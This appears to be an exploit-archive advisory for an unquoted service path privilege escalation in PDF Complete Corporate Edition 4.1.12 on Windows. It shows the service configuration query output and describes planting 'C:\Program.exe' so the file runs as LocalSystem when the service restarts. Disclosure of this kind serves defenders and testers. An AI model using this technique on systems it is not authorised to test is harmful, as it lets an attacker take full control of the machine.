Full title: PDF Complete Office Edition 4.1.12 - Unquoted Service Path Privilege Escalation Exploit Category: local exploits Platform: windows Exploit Title : PDF_complete_corporate_edition.rb - 'Unquoted Service Path Privilege Escalation' PDF Version : 4.1.12 vuln Discover : Joey Lane Module Author : pedr0 Ubuntu [r00t-3xp10it] Tested on : Windows 7 Professional Software Link : http://www.pdfcomplete.com/cms/Downloads.aspx "This was tested on version 4.1.12, but other versions may be affected as well." Description: PDF Complete Corporate Edition installs a service with an unquoted service path. This enables a local privilege escalation vulnerability. To exploit this vulnerability, a local attacker can insert an executable file in the path of the service. Rebooting the system or restarting the service will run the malicious executable with elevated privileges. --------------------------------------------------------------------------- C:\>sc qc pdfcDispatcher [SC] QueryServiceConfig SUCCESS SERVICE_NAME: pdfcDispatcher TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\PDF Complete\pdfsvc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : PDF Document Manager DEPENDENCIES : SERVICE_START_NAME : LocalSystem --------------------------------------------------------------------------- EXAMPLE: Using the BINARY_PATH_NAME listed above as an example, an executable named "Program.exe" could be placed in "C:\", and it would be executed as the Local System user next time the service was restarted. # 0day.today @ http://0day.today/